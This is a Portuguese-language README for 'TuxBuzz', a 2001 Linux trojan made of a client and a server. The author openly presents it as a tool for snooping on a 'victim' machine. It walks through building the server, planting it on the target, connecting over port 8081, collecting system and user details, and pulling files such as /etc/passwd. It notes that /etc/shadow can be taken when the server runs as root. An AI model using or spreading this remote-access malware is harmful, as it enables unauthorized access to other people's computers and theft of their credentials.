TuxBuZZ v0.0.1b bY DoC#include


O que e TuxBuzz ?

TuxBuzz e um embriao do que nos costumamos chamar de "cavalo de 
troia". E composto de dois programas: um programa cliente (tclient)
e um programa servidor (tserver). O programa servidor e aquele que 
e instalado na maquina "da vitima", o cliente e o que deve ser insta
lado na maquina de quem vai "bisbilhotar" a maquina da vitima. O cli
ente e o servidor se comunicam por meio de uma conexao TCP/IP. Depois
que o servidor e instaldo na maquina, ele abrira uma porta (a padrao
e 8081) e ficara em escuta a espera de uma requisicao do cliente. O 
servidor ira assumir a identidade de quem iniciou o processo, de forma
que os privilegios de acesso ao sistema de arquivos da maquina "infec
tada" serao os mesmos de quem iniciou o programa servidor. 

compilacao e instalacao:

nenhuma novidade:
  tar -xzvf tuxbuzz-x.x.x.tar.gz
  cd tuxbuzz-x.x.x
  make
  make install : )
  
  
testando:
execute o servidor em um terminal:
  ./tserver
  
  TuXBuZZ Server 0.0.1b bY DoC#include listening on port 8081
  (this version was compiled for debuging)
  
em outro terminal, execute o cliente:
  ./tclient
  
  ********************************************************
  TuXBuZZ Client v0.0.1b bY DoC#include
  CopyRight 2001 All Rights Reserved
  This Software is Registered under the GNU Public License
  ********************************************************
  
  tuxbuzz>
  
  
  por enquanto, os comandos sao bem simples. E possivel extrair informa
  coes da maquina (S.O, processador, etc), do usuario que iniciou o pro
  cesso e baixar arquivos para a maquina do cliente.
  
  
conectando:
  
  tuxbuzz> connect <endereco_ip> [porta]
  
  exemplo:
  
  tuxbuzz> connect 127.0.0.1 8081 <ENTER>
  connected to 127.0.0.1 on port 8081
  Wellcome to TuXBuZZ server v0.0.1b (not running as root)
  tuxbuzz>
  
  A mensagen de boas vindas dependera de se o servidor estiver rodando como
  usuario ou como root. Se estiver rodando como root, vc vera uma mensagen
  diferente:
  
   tuxbuzz> connect 127.0.0.1 8081 <ENTER>
   connected to 127.0.0.1 on port 8081
         OWWWWWWWW SHIIIIIIIIT !!!!!!!!! NoT OnLY WinDoZe can bE HacKed.
   Wellcome to TuXBuZZ server v0.0.1b running as ROOT !!!
   Good Luck !
   tuxbuzz>
   
   
   
   para pegar um arquivo:
   
   tuxbuzz> get <arquivo_remoto> <arquivo_local>
   (como se fosse um ftp)
   
   exemplo:
   
   tuxbuzz> get /etc/passwd /home/xyz/passwd <enter>
   downloaded file /etc/passwd as /home/xyz/passwd (582 bytes total)
   
   faz o download do arquivo /etc/passwd do servidor para a sua maquina nome
   ando-o como /home/xyz/passwd
   
   obs1: cuidado ! voce nao podera fazer um "get /etc/shadow" a nao ser que o 
   servidor esteja rodando como root...mas se estiver, vc podera baixar o que 
   bem entender ! Por isso e que esse programa, apesar de ainda ser um embriao,
   pode ser realmente perigoso : (.
   
   obs2: se voce nao fornecer o nome do arquivo local, o conteudo do arquivo remoto
   sera jogado diretamente para a saida padrao (a tela) como se fosse um "cat" 
   remoto. Isso e bom se voce quiser apenas visualizar o conteudo de um arquivo texto
   (mas tome cuidado para nao fazer isso com arquivos binarios : )).
   
   
   pegando informacoes basicas:
   
   tuxbuzz> rinfo <remote> ou
   tuxbuzz> rinfo <user>
   
   tuxbuzz> rinfo remote <enter>
   OS: Linux
   Machine Name: comasseto
   Release: 2.0.2
   Version: #1 Sat Aug 18 14:24:50 BRT 2001
   Machine: i586
   tuxbuzz>
   
   
   tuxbuzz> rinfo user
   Username: root #oooopppsss !!!!!
   User Password: x #nao tao rapido, tio !!!
   User ID: 0
   Group ID: 0
   Comment:
   Home Directory: /root
   Shell: /bin/bash
   tuxbuzz>
   
   fechando a conexao:
   
   tuxbuzz> close
   connection closed. 28 bytes sended, 1998 bytes received.
   tuxbuzz>
   
   
   obtendo ajuda dos comandos:
   tuxbuzz> help
   
   saindo do programa:
   
   tuxbuzz> quit
   xyz@blablabla:~/tuzbuzz-0.0.1b$
   
   
   E por enquanto e isso ai...
   enjoy !
   
   bY
   DoC#include
